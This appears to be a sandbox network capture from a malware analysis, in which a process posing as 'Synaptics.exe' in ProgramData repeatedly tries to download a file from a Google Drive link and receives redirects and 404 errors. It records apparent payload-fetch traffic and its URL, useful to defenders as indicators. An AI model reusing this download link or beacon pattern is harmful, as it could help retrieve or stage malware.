                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


                                                                                                                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                                                                                            90  192.168.2.8  49854  142.250.185.161  443  7732  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                            2024-12-30 10:49:36 UTC  387  OUT  GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:36 UTC  1250  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC61pQVVNa3vxqZPAlo0auJ9JiKvd_6j3JrQbOF4iNecks9NJUje_kF-gzk8HZxySJKFwEwV41Y
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:36 GMT
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-IkRyUo5EmdZJxsmX14raSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
2024-12-30 10:49:36 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:49:36 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="39qaTZs4tVzCNUDlsIJfmQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:49:36 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
91 | 192.168.2.8 | 49853 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:36 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:36 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:36 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-YVPLeg4Icw5weZP6m3K3xg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
92 | 192.168.2.8 | 49855 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:36 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:36 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:36 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-2I55lOdXTuFfbVw7Anj0mg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
93 | 192.168.2.8 | 49858 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:37 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:37 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC66P3HpfYHCFpNAm2ol3204aHvW-CKGNGo-232F3Pk5VHVL5GIkEyrBQZGTTc9_0Wu7
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:37 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-6JzYFZ4z3BlnIkEz-L5xVQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
2024-12-30 10:49:37 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:49:37 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="U4k6d79NafvG_13NTMtZfg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:49:37 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
94 | 192.168.2.8 | 49859 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:37 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:37 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:37 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-sSuWMkEzBibl7lkG7xihpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            95 | 192.168.2.8 | 49861 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:37 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:37 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:37 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-5LQNx_lEAbaNmmJnrHnPyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            96 | 192.168.2.8 | 49860 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:37 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:38 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC6OvPLq_49AU8X_zbQTgnhpkWfKv5xq2n6pn-TiMn2cpRAuyWF9I0Gah7OzSjBnNc8SIYyDoKg
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:38 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-_iB_8PufKkFaGkso8o2S-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:38 UTC | 140 | IN
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                            2024-12-30 10:49:38 UTC | 1390 | IN
                                                                                                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="NBvE8IeBxFUNlNiVfFDAUA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                            2024-12-30 10:49:38 UTC | 122 | IN
                                                                                                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            97 | 192.168.2.8 | 49862 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:38 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:38 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:38 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-wGZAZ2DmgVW-65ostKmNqw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            98 | 192.168.2.8 | 49863 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:38 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:38 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC4ORFCnUXer_NBTEV4_VBFNLSGiYZUcNyk3A6wW0Rgfql0LvSw4dTTYQJeN1V5wUSWo
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:38 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-VMdnK8K4cmbFBXnAEf02RQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:38 UTC | 147 | IN
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                            2024-12-30 10:49:38 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="C5VVpRqSaHIE-ZrQhjxQmQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                            2024-12-30 10:49:38 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
